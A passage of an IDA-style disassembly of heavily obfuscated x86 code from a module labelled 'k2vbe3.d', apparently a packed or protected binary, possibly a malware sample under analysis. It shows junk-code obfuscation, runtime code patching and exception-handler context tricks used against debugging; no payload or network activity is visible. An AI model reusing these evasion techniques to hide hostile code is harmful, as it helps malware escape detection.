; FUNCTION CHUNK AT 004407F3 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 00440ECD SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044155A SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00449FAF SIZE 0000001B BYTES
; FUNCTION CHUNK AT 0044B374 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044CE24 SIZE 00000009 BYTES
; FUNCTION CHUNK AT 004543C2 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00459822 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 00459E17 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0045AB94 SIZE 0000002A BYTES

		push	0C572738Ah
		pop	eax
		or	eax, 0B870EDEEh
		jmp	loc_4407F3
sub_4486D7	endp

; ---------------------------------------------------------------------------
		push	offset sub_44146B
		jmp	loc_44C8A5
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_447E07

loc_4486F2:				; CODE XREF: sub_447E07-4524j
					; k2vbe3.d:00447FA1j ...
		xchg	eax, [esp-4+arg_0]
		mov	ecx, eax
		pop	eax
		xchg	eax, [esp-8+arg_4]
		mov	ebp, eax

loc_4486FD:				; CODE XREF: k2vbe3.d:00445224j
		call	sub_444231

loc_448702:				; CODE XREF: k2vbe3.d:00459938j
		jmp	loc_43CBEF
; END OF FUNCTION CHUNK	FOR sub_447E07

; =============== S U B	R O U T	I N E =======================================



sub_448707	proc near		; DATA XREF: sub_44498A+16B9o

arg_0		= dword	ptr  4

		popf
		xchg	edi, [esp-4+arg_0]
		jmp	sub_4553CC
sub_448707	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44D298

loc_448710:				; CODE XREF: sub_4429FF:loc_443E17j
					; sub_44D298:loc_450FC7j
		jz	loc_452C93
		call	nullsub_1
; END OF FUNCTION CHUNK	FOR sub_44D298
; START	OF FUNCTION CHUNK FOR sub_448DD4

loc_44871B:				; CODE XREF: sub_448DD4:loc_43C035j
					; sub_45B029-1862Fj
		jo	loc_45BDB4
		xor	eax, eax
		mov	[ebp-0Ch], eax
		cmp	dword ptr [ebp-4], 0
		jz	loc_452C93
		jmp	loc_448803
; END OF FUNCTION CHUNK	FOR sub_448DD4

; =============== S U B	R O U T	I N E =======================================



sub_448735	proc near		; CODE XREF: sub_441172:loc_43CF79p
					; k2vbe3.d:0045A87Bj

; FUNCTION CHUNK AT 00454E38 SIZE 00000005 BYTES

		xchg	ebx, [esp+0]
		pop	ebx
		push	esi
		push	offset sub_445060
		jmp	loc_454E38
sub_448735	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44F1A6

loc_448744:				; CODE XREF: sub_44F1A6+D199j
		push	esi
		cmp	edx, 33449202h
		jmp	loc_446E10
; END OF FUNCTION CHUNK	FOR sub_44F1A6
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44469A

loc_448750:				; CODE XREF: sub_44469A-14D7j
		jnz	loc_43FB49

loc_448756:				; CODE XREF: sub_45B20A-14A43j
		jmp	loc_43DBD9
; END OF FUNCTION CHUNK	FOR sub_44469A
; ---------------------------------------------------------------------------
		or	eax, 3C74D20Ch
		sbb	eax, ebp
		jmp	loc_43FB49
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_443EF6

loc_448768:				; CODE XREF: sub_443EF6+Cj
		jz	loc_43F47B
		jmp	loc_444FBE
; END OF FUNCTION CHUNK	FOR sub_443EF6
; ---------------------------------------------------------------------------
		and	esi, 0BF947B9h
		jmp	sub_44E0F6
; ---------------------------------------------------------------------------

loc_44877E:				; DATA XREF: k2vbe3.d:004536F1o
		mov	eax, [eax]
		mov	[ebp-24h], eax
		lea	eax, [ebp-12Dh]
		mov	[ebp-28h], eax
; START	OF FUNCTION CHUNK FOR sub_44921C

loc_44878C:				; CODE XREF: sub_44921C:loc_43FD46j
		mov	eax, [ebp-24h]
		cmp	byte ptr [eax],	0
		jnz	loc_441E96
		jmp	loc_451D03
; END OF FUNCTION CHUNK	FOR sub_44921C
; ---------------------------------------------------------------------------

loc_44879D:				; CODE XREF: k2vbe3.d:00440FD9j
		rol	edx, 0Bh
; START	OF FUNCTION CHUNK FOR sub_43D31B

loc_4487A0:				; CODE XREF: sub_43D31B:loc_440FC9j
		xor	esi, 1AD87186h

loc_4487A6:				; CODE XREF: sub_454354:loc_45408Aj
		rol	esi, 7
		add	esi, 88C7D70Fh
		xchg	esi, [esp+4+var_4]
		jmp	loc_44B1D3
; END OF FUNCTION CHUNK	FOR sub_43D31B
; ---------------------------------------------------------------------------
		adc	esi, 7D0A5BC6h
		jmp	loc_4423A1
; ---------------------------------------------------------------------------
		mov	ds:off_41E10C, eax
		push	offset sub_45625C
		jmp	locret_43CD26

; =============== S U B	R O U T	I N E =======================================



sub_4487D2	proc near		; CODE XREF: k2vbe3.d:0043FF4Ej
					; k2vbe3.d:0045A673p

var_4		= dword	ptr -4

		xchg	edi, [esp+0]
		pop	edi
		push	esi
		push	9D7B7232h
		xchg	edi, [esp+4+var_4]
		mov	esi, edi
		pop	edi
		sub	esi, ds:4000EFh
		jmp	loc_4432B5
sub_4487D2	endp


; =============== S U B	R O U T	I N E =======================================



sub_4487ED	proc near		; DATA XREF: k2vbe3.d:0045535Co
		call	sub_4553CC
		push	offset sub_4571C8
		jmp	loc_45A460
sub_4487ED	endp

; ---------------------------------------------------------------------------

loc_4487FC:				; CODE XREF: k2vbe3.d:loc_451ADEj
		mov	ds:dword_441764, eax
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448DD4

loc_448803:				; CODE XREF: sub_448DD4-6A4j
		jmp	loc_45BDA1
; END OF FUNCTION CHUNK	FOR sub_448DD4
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44945C

loc_448808:				; CODE XREF: sub_44945C:loc_43CAF5j
		call	sub_43CC75

loc_44880D:				; CODE XREF: k2vbe3.d:0044613Cj
		jmp	loc_45B398
; END OF FUNCTION CHUNK	FOR sub_44945C
; ---------------------------------------------------------------------------

loc_448812:				; CODE XREF: k2vbe3.d:00459C79j
		jb	loc_44D1E4
		and	esi, 67065D0h

; =============== S U B	R O U T	I N E =======================================



sub_44881E	proc near		; CODE XREF: sub_45B20A-CF30p

arg_0		= dword	ptr  4
arg_10		= dword	ptr  14h

; FUNCTION CHUNK AT 0043EC20 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 0044C511 SIZE 00000005 BYTES

		xchg	eax, [esp+0]
		pop	eax
		xchg	ebp, [esp+0]
		mov	ecx, [esp+10h]
		mov	dword ptr [ecx], 10001h
		jmp	loc_43EC20
sub_44881E	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_448834	proc near		; CODE XREF: sub_444B3Ep
					; k2vbe3.d:0044729Bj

var_4		= dword	ptr -4

; FUNCTION CHUNK AT 00446A28 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0044A1E2 SIZE 0000001B BYTES
; FUNCTION CHUNK AT 0045284B SIZE 00000005 BYTES

		xchg	eax, [esp+0]
		pop	eax
		push	ebp
		mov	ebp, esp
		jmp	loc_45284B
sub_448834	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		xchg	edx, [ebx]
		and	ecx, 3E612CAAh
		jmp	sub_43F75C
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_138. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44DCC0

loc_44884E:				; CODE XREF: sub_44DCC0+Cj
		jmp	loc_43C4E5
; END OF FUNCTION CHUNK	FOR sub_44DCC0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43CF35

loc_448853:				; CODE XREF: sub_43CF35:loc_4552B3j
		push	eax
		call	sub_444DA9
		mov	[ebp-8], eax
		cmp	dword ptr [ebp-8], 0
		jz	loc_456B97
		jmp	loc_45967D
; END OF FUNCTION CHUNK	FOR sub_43CF35
; ---------------------------------------------------------------------------
		mov	[eax], ebp
		jmp	sub_447D2E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_444B3E

loc_448872:				; CODE XREF: sub_444B3E:loc_43F342j
		cdq
		add	eax, [esp+0]
		adc	edx, [esp+arg_0]
		add	esp, 8
		mov	[ebp-4], eax
		push	0E873BD41h
		pop	eax
		jmp	loc_451246
; END OF FUNCTION CHUNK	FOR sub_444B3E
; ---------------------------------------------------------------------------
		sbb	edi, 0AAE99FF1h
		rol	ebx, 0Fh
		jmp	sub_44990B
; ---------------------------------------------------------------------------
		mov	eax, 0DD5E106Fh
		call	sub_4553CC
		mov	ds:off_41E100, eax
		lea	eax, sub_451CCE
		mov	byte ptr [eax],	0C3h
		jmp	loc_44DF9D
; ---------------------------------------------------------------------------
		call	nullsub_482
		jmp	ds:dword_41E104
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_482. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
		test	[ecx+28h], edi
		add	[eax], eax
		jmp	loc_449B17
; ---------------------------------------------------------------------------
		dec	eax
		mov	edx, ds:dword_441774
		mov	[edx], eax

; =============== S U B	R O U T	I N E =======================================



sub_4488D6	proc near		; CODE XREF: sub_458019:loc_43E964j
					; k2vbe3.d:00450E81j ...

var_4		= dword	ptr -4

; FUNCTION CHUNK AT 0043F9EF SIZE 00000028 BYTES
; FUNCTION CHUNK AT 00448FAF SIZE 0000000E BYTES

		push	ebx
		jmp	loc_43F9EF
sub_4488D6	endp

; ---------------------------------------------------------------------------
		or	edx, ebx
		jmp	sub_4529D2

; =============== S U B	R O U T	I N E =======================================



sub_4488E3	proc near		; CODE XREF: k2vbe3.d:0043D50Cj
					; k2vbe3.d:00440FB2p

arg_0		= dword	ptr  4

		xchg	ebx, [esp+0]
		pop	ebx
		xor	ecx, 729ECDB0h
		xor	eax, ecx
		xchg	ebx, [esp-4+arg_0]
		mov	ecx, ebx
		pop	ebx
sub_4488E3	endp ; sp-analysis failed

; START	OF FUNCTION CHUNK FOR sub_4481FA

loc_4488F5:				; CODE XREF: sub_4481FA+D66Fj
		rol	eax, 2
		jmp	loc_447261
; END OF FUNCTION CHUNK	FOR sub_4481FA
; ---------------------------------------------------------------------------

loc_4488FD:				; CODE XREF: k2vbe3.d:00450C01j
		jge	loc_456E6B
		cmp	ebx, edi
		jmp	loc_442A79
; ---------------------------------------------------------------------------
		popf
		adc	ebp, edx
		jmp	sub_44EBBF
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B912

loc_448912:				; CODE XREF: sub_44B912-64Ej
		jo	loc_457918
		xor	edx, 0A94AAD93h
		cmp	esi, ebx
		jmp	loc_455C8E
; END OF FUNCTION CHUNK	FOR sub_44B912
; ---------------------------------------------------------------------------
		push	ecx
		mov	ecx, [esp+10h]
		mov	dword ptr [ecx], 10001h
		lea	eax, loc_451CE5
		mov	[ecx+0B8h], eax
		pop	ecx
		xor	eax, eax
		jmp	loc_43FA9D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44D9A7

loc_448944:				; CODE XREF: sub_44D9A7:loc_43F3D2j
		pop	edx
		call	sub_45837E
		push	ecx
		push	0EEB664h
		xchg	ebx, [esp+0]
		jmp	loc_454C4B
; END OF FUNCTION CHUNK	FOR sub_44D9A7
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4461D5

loc_448958:				; CODE XREF: sub_4461D5+E23Dj
		and	esi, 0BB62DEDBh
; END OF FUNCTION CHUNK	FOR sub_4461D5
; START	OF FUNCTION CHUNK FOR sub_445124

loc_44895E:				; CODE XREF: sub_445124:loc_458967j
		cmp	esi, 0E033B7C8h
		jmp	loc_43FDE9
; END OF FUNCTION CHUNK	FOR sub_445124
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_160. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44DD31

loc_44896A:				; CODE XREF: sub_44DD31:loc_452060j
		test	edi, ecx

loc_44896C:				; CODE XREF: k2vbe3.d:004558D2j
		jmp	loc_43D047
; END OF FUNCTION CHUNK	FOR sub_44DD31
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F75C

loc_448971:				; CODE XREF: sub_43F75C:loc_44215Dj
		mov	ecx, esi
		pop	esi
		xchg	ebx, [esp-8+arg_4]
		mov	ebp, ebx
		pop	ebx
		jmp	loc_45382B
; END OF FUNCTION CHUNK	FOR sub_43F75C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4448E9

loc_44897F:				; CODE XREF: sub_4448E9:loc_44A0D2j
		pop	edi
		sub	edi, 13040405h
		test	edi, 100h
		jmp	loc_44DC88
; END OF FUNCTION CHUNK	FOR sub_4448E9
; ---------------------------------------------------------------------------

loc_448991:				; CODE XREF: k2vbe3.d:0043D132j
		jnz	loc_44A93A
; START	OF FUNCTION CHUNK FOR sub_43C3A9

loc_448997:				; CODE XREF: sub_43C3A9:loc_451D46j
		jmp	loc_45A0A9
; END OF FUNCTION CHUNK	FOR sub_43C3A9
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44D0D5

loc_44899C:				; CODE XREF: sub_44D0D5+8A35j
		xor	eax, 0A361DF19h
		mov	ds:dword_44409C, eax

loc_4489A8:				; CODE XREF: sub_457D4B-C54Dj
					; sub_457D4B:loc_45258Bj
		xor	eax, 0A361DF19h
		ror	eax, 3
		jz	loc_45B96E
		jmp	loc_44E33F
; END OF FUNCTION CHUNK	FOR sub_44D0D5
; ---------------------------------------------------------------------------

loc_4489BC:				; CODE XREF: k2vbe3.d:0043D2DDj
		xor	eax, 0E167564Dh
		add	eax, 0BF049CF3h
		mov	eax, [eax]
		or	eax, eax
		jnz	loc_457AE6
		jmp	loc_44DE3B
; ---------------------------------------------------------------------------

loc_4489D7:				; CODE XREF: k2vbe3.d:0043E5C6j
					; k2vbe3.d:0044D766j
		jno	loc_443EFC
		xor	esi, 0B354C92Fh

; =============== S U B	R O U T	I N E =======================================



sub_4489E3	proc near		; CODE XREF: k2vbe3.d:loc_458600p

arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 0044C870 SIZE 00000005 BYTES

		xchg	ecx, [esp+0]
		pop	ecx
		xchg	edi, [esp-4+arg_0]
		jmp	loc_44C870
sub_4489E3	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_442475

loc_4489EF:				; CODE XREF: sub_442475:loc_447F49j
		jz	loc_45A206
		jmp	loc_44463F
; END OF FUNCTION CHUNK	FOR sub_442475
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4524D2

loc_4489FA:				; CODE XREF: sub_4524D2+9676j
		mov	eax, [eax]
		add	eax, [ebp-4]
		call	sub_4402FA
		cmp	eax, [ebp-8]
		jnz	loc_44FD18
		call	sub_44CE6C
; END OF FUNCTION CHUNK	FOR sub_4524D2
; START	OF FUNCTION CHUNK FOR sub_4541C2

loc_448A12:				; CODE XREF: sub_4541C2+Cj
		jmp	nullsub_151
; END OF FUNCTION CHUNK	FOR sub_4541C2
; ---------------------------------------------------------------------------

loc_448A17:				; CODE XREF: k2vbe3.d:004499E7j
		jmp	sub_44D0D5
; ---------------------------------------------------------------------------

loc_448A1C:				; CODE XREF: k2vbe3.d:loc_44857Ej
		or	edi, 0D3D9541Ch
		rol	edi, 1Dh
		sub	edi, 0BF476A22h
		rol	edi, 0Eh
		add	edi, 0FC1AFFB7h
		xchg	edi, [esp]
		jmp	sub_45B74D
; ---------------------------------------------------------------------------

loc_448A3C:				; CODE XREF: k2vbe3.d:loc_455973j
		jz	loc_44D981
		jmp	loc_43E96F
; ---------------------------------------------------------------------------

loc_448A47:				; CODE XREF: k2vbe3.d:loc_441067j
		mov	edx, 81833C41h
		pushf
		mov	edx, 0A6DF5CB8h
		jmp	loc_452AB9
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_446E24

loc_448A57:				; CODE XREF: sub_446E24:loc_448BCAj
		jnz	loc_443B4B
		jmp	loc_443E4F
; END OF FUNCTION CHUNK	FOR sub_446E24
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44863D

loc_448A62:				; CODE XREF: sub_44863D:loc_44A7BDj
		pop	edi
		retn
; END OF FUNCTION CHUNK	FOR sub_44863D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4518D8

loc_448A64:				; CODE XREF: sub_4518D8+93D1j
		jmp	loc_456F75
; END OF FUNCTION CHUNK	FOR sub_4518D8
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44A306

loc_448A69:				; CODE XREF: sub_44A306+107BBj
					; sub_44B94B+102ECj
		rol	eax, 0Ah
		push	eax
		call	sub_453347
		jmp	loc_44AC09
; END OF FUNCTION CHUNK	FOR sub_44A306
; ---------------------------------------------------------------------------

loc_448A77:				; CODE XREF: k2vbe3.d:0043E94Aj
		adc	eax, 0F6DB9967h

; =============== S U B	R O U T	I N E =======================================



sub_448A7D	proc near		; CODE XREF: k2vbe3.d:0044DC6Ap

; FUNCTION CHUNK AT 00441911 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00444F9F SIZE 00000012 BYTES
; FUNCTION CHUNK AT 0044BFAA SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044F3DC SIZE 00000006 BYTES
; FUNCTION CHUNK AT 0044FC7F SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00451AA7 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 004526AB SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00453030 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 004584C9 SIZE 0000000E BYTES

		xchg	ecx, [esp+0]
		pop	ecx
		push	8E9F8F19h
		pop	edx
		xor	edx, 0EF687BA0h
		jmp	loc_44BFAA
sub_448A7D	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_442C22

loc_448A92:				; CODE XREF: sub_442C22-41D5j
		cdq
		jb	loc_458C5F

loc_448A99:				; CODE XREF: sub_442C22:loc_456D61j
		push	0D0906D8h
		pop	eax
		xor	eax, 0B5FE2CFCh
		test	eax, 800000h
		jmp	loc_43D4DA
; END OF FUNCTION CHUNK	FOR sub_442C22
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_447664

loc_448AB0:				; CODE XREF: sub_447664:loc_450DE7j
		sub	ecx, 0F797C8CEh
		xor	ecx, 2E6F4F3Ah
		and	ecx, 0DE328F24h
		add	ecx, 0FC31EC34h
		xchg	ecx, [esp+0]
		jmp	loc_44CA63
; END OF FUNCTION CHUNK	FOR sub_447664
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_446E24

loc_448AD0:				; CODE XREF: sub_446E24+3B57j
		push	edx
		cmp	edi, 7454902h
		jmp	loc_44A774
; END OF FUNCTION CHUNK	FOR sub_446E24
; ---------------------------------------------------------------------------

loc_448ADC:				; CODE XREF: k2vbe3.d:00453279j
		and	esi, 0E9B2EDE4h

; =============== S U B	R O U T	I N E =======================================



sub_448AE2	proc near		; CODE XREF: sub_449EF8+Ap

; FUNCTION CHUNK AT 004404A8 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 00442F95 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 00448D44 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044EFDB SIZE 0000001B BYTES
; FUNCTION CHUNK AT 00455A1B SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004562AD SIZE 00000005 BYTES

		xchg	ecx, [esp+0]
		pop	ecx
		push	ebx
		mov	ebx, eax
		xchg	ebx, [esp+0]
		jmp	loc_455A1B
sub_448AE2	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_442DF0

loc_448AF1:				; CODE XREF: sub_442DF0:loc_454BC9j
		add	eax, esi
		pop	esi
		push	eax
		call	sub_44A0C1
		mov	eax, [ebp-80Ch]
		jmp	loc_446EEE
; END OF FUNCTION CHUNK	FOR sub_442DF0
; ---------------------------------------------------------------------------
		and	ebp, esi
		jmp	sub_45B180
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_457D4B

loc_448B0C:				; CODE XREF: sub_448052+19j
					; sub_457D4B:loc_4563F8j
		call	sub_457024
		retn
; END OF FUNCTION CHUNK	FOR sub_457D4B
; ---------------------------------------------------------------------------
		dw 8263h
dword_448B14	dd 0			; DATA XREF: sub_451759:loc_44B9B7r
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43D0A9

loc_448B18:				; CODE XREF: sub_43D0A9+83C8j
		jmp	loc_44B0CE
; END OF FUNCTION CHUNK	FOR sub_43D0A9
; ---------------------------------------------------------------------------
		fild	dword ptr [edi-78h]

loc_448B20:				; DATA XREF: sub_457B49-EF16o
					; sub_44F174+4o
		mov	al, ds:0A0285611h
		sub	[ecx+638C2E19h], ebx
		sbb	eax, [eax]
; START	OF FUNCTION CHUNK FOR sub_448113

loc_448B2D:				; CODE XREF: sub_448113+102E7j
		jmp	loc_455F16
; END OF FUNCTION CHUNK	FOR sub_448113
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45BE94

loc_448B32:				; CODE XREF: sub_45BE94-188FBj
		jmp	loc_44F27D
; END OF FUNCTION CHUNK	FOR sub_45BE94
; ---------------------------------------------------------------------------
		jno	loc_443A45
		mov	edx, ds:dword_447394
		or	edx, edx
		jmp	loc_455617
; ---------------------------------------------------------------------------
		mov	ds:off_41E010, eax
		lea	eax, loc_446CBF
		mov	byte ptr [eax],	0C3h
		jmp	loc_446CBF

; =============== S U B	R O U T	I N E =======================================



sub_448B5E	proc near		; CODE XREF: sub_41A465+53p
					; sub_41A465+8Ep ...

var_8		= dword	ptr -8
var_4		= dword	ptr -4

; FUNCTION CHUNK AT 0043C153 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 0043D3BA SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0043EFAC SIZE 0000001D BYTES
; FUNCTION CHUNK AT 0043F6AF SIZE 0000001C BYTES
; FUNCTION CHUNK AT 00441728 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00441973 SIZE 00000019 BYTES
; FUNCTION CHUNK AT 00446694 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044ED1C SIZE 0000000F BYTES
; FUNCTION CHUNK AT 00450F3A SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004593B2 SIZE 00000024 BYTES

		push	eax
		push	9180B34Ch
		pop	eax
		jmp	loc_450F3A
sub_448B5E	endp

; ---------------------------------------------------------------------------

loc_448B6A:				; CODE XREF: k2vbe3.d:loc_44D80Ej
		jo	loc_44A986
		mov	ebp, 86EF9C15h
		jmp	loc_447915
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_441409

loc_448B7A:				; CODE XREF: sub_446E24:loc_441592j
					; sub_441409:loc_44B111j
		push	0A05C7E85h
		xchg	edi, [esp+8+var_8]
		mov	eax, edi
		pop	edi
		sub	eax, 0C64CDD3Dh
		xor	eax, 0CE29F4CFh
		add	eax, 11EDF5B8h
		or	eax, 0BF9D2738h
		jmp	loc_446975
; END OF FUNCTION CHUNK	FOR sub_441409
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_449372

loc_448BA2:				; CODE XREF: sub_449372-27D9j
		call	sub_45080C

loc_448BA7:				; CODE XREF: sub_45064D+B34Fj
		jmp	loc_43EBD2
; END OF FUNCTION CHUNK	FOR sub_449372
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45B20A

loc_448BAC:				; CODE XREF: sub_45B20A-E9B8j
		jmp	loc_4598A9
; END OF FUNCTION CHUNK	FOR sub_45B20A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_449D74

loc_448BB1:				; CODE XREF: sub_449D74+3j
		jmp	loc_4552E2
; END OF FUNCTION CHUNK	FOR sub_449D74
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4460FD

loc_448BB6:				; CODE XREF: sub_4460FD:loc_44D6EEj
		ror	edx, 1Fh
		sub	edx, 44703FF5h
		jmp	loc_44073C
; END OF FUNCTION CHUNK	FOR sub_4460FD
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_447EB8

loc_448BC4:				; CODE XREF: sub_447EB8+14j
		jnz	loc_4548AE
; END OF FUNCTION CHUNK	FOR sub_447EB8
; START	OF FUNCTION CHUNK FOR sub_446E24

loc_448BCA:				; CODE XREF: sub_446E24+3966j
		jmp	loc_448A57
; END OF FUNCTION CHUNK	FOR sub_446E24
; ---------------------------------------------------------------------------

loc_448BCF:				; CODE XREF: k2vbe3.d:0043C0DEj
		jmp	loc_44ED88
; ---------------------------------------------------------------------------
		adc	ecx, 12BF50CCh
		sub	ebp, ecx
		and	ebx, 0A7742F51h
		jmp	loc_4548A6
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_449372

loc_448BE7:				; CODE XREF: sub_449372:loc_44214Ej
		and	ebp, eax
		jmp	loc_43F788
; END OF FUNCTION CHUNK	FOR sub_449372
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_441D41

loc_448BEE:				; CODE XREF: sub_441D41:loc_43CDA6j
					; sub_441D41-4F85j
		xor	esi, 1BA99BB2h
		and	esi, ds:4000EFh
		jnz	loc_44242B
		popf
		xor	eax, 0FFBA26E8h
		jnz	loc_45BC68
		xchg	ecx, [edi]
		jmp	loc_44242B
; END OF FUNCTION CHUNK	FOR sub_441D41
; ---------------------------------------------------------------------------

loc_448C14:				; CODE XREF: k2vbe3.d:0044D720j
		jns	loc_453034

; =============== S U B	R O U T	I N E =======================================



sub_448C1A	proc near		; CODE XREF: sub_43FE2A:loc_458E38p

; FUNCTION CHUNK AT 004475A4 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 0044FF06 SIZE 00000005 BYTES

		xchg	eax, [esp+0]
		pop	eax
		or	eax, eax
		jz	loc_4475B4
		jmp	loc_4475A4
sub_448C1A	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_457B49

loc_448C2B:				; CODE XREF: sub_457B49+2417j
		push	0F1300761h
		or	eax, ebx

loc_448C32:				; CODE XREF: sub_457B49:loc_44F685j
		push	eax
		lea	eax, loc_448B20
		push	eax
		push	eax
		mov	edx, eax
		jmp	loc_4542EC
; END OF FUNCTION CHUNK	FOR sub_457B49
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44866A

loc_448C42:				; CODE XREF: sub_44866A-5920j
		ja	loc_455CE8
		xchg	edi, [ebp+0]

loc_448C4B:				; CODE XREF: sub_44866A:loc_4570B5j
		mov	eax, [ebp-4]
		push	offset loc_451931
		jmp	loc_447DDE
; END OF FUNCTION CHUNK	FOR sub_44866A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_457D11

loc_448C58:				; CODE XREF: sub_457D11+18j
		jnz	loc_45A27D
; END OF FUNCTION CHUNK	FOR sub_457D11
; START	OF FUNCTION CHUNK FOR sub_45B20A

loc_448C5E:				; CODE XREF: sub_45B20A-195Bj
		jmp	loc_453F26
; END OF FUNCTION CHUNK	FOR sub_45B20A
; ---------------------------------------------------------------------------
		push	ebp
		sub	edx, ebp
		cmp	ebx, ebp
		jmp	loc_45A275
; ---------------------------------------------------------------------------

loc_448C6D:				; CODE XREF: k2vbe3.d:004415CBj
		or	ecx, esi
		add	ebp, 0ED27AEBDh
		xor	edx, ebx
; START	OF FUNCTION CHUNK FOR sub_44921C

loc_448C77:				; CODE XREF: sub_44921C-7C5Ej
		add	eax, 7AB6EACAh
		call	sub_451C29

loc_448C82:				; CODE XREF: sub_43FCA0+1204Cj
		jmp	loc_44E858
; END OF FUNCTION CHUNK	FOR sub_44921C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44EBBF

loc_448C87:				; CODE XREF: sub_44EBBF+7070j
		jz	loc_4540E3
; END OF FUNCTION CHUNK	FOR sub_44EBBF
; START	OF FUNCTION CHUNK FOR sub_4499EC

loc_448C8D:				; CODE XREF: sub_4499EC-CFB7j
		jmp	loc_45913B
; END OF FUNCTION CHUNK	FOR sub_4499EC
; ---------------------------------------------------------------------------
		test	ecx, esi
		jmp	loc_4479CA
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_457D4B

loc_448C99:				; CODE XREF: sub_457D4B:loc_452F38j
		pop	ebp
		sub	edi, 69620BB0h
		rol	edi, 8
		add	edi, 894A0940h
		xchg	edi, [esp-8+arg_4]
		jmp	loc_43E26E
; END OF FUNCTION CHUNK	FOR sub_457D4B
; ---------------------------------------------------------------------------

loc_448CB1:				; DATA XREF: sub_459AEA-B32o
		push	edx
		call	sub_45BD38
; START	OF FUNCTION CHUNK FOR sub_44D16B

loc_448CB7:				; CODE XREF: sub_44D16B-559Fj
		jmp	loc_43DC8C
; END OF FUNCTION CHUNK	FOR sub_44D16B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F7AC

loc_448CBC:				; CODE XREF: sub_43F7AC+67B2j
		jmp	loc_45C26F
; END OF FUNCTION CHUNK	FOR sub_43F7AC

; =============== S U B	R O U T	I N E =======================================



sub_448CC1	proc near		; DATA XREF: sub_442745+25ECo

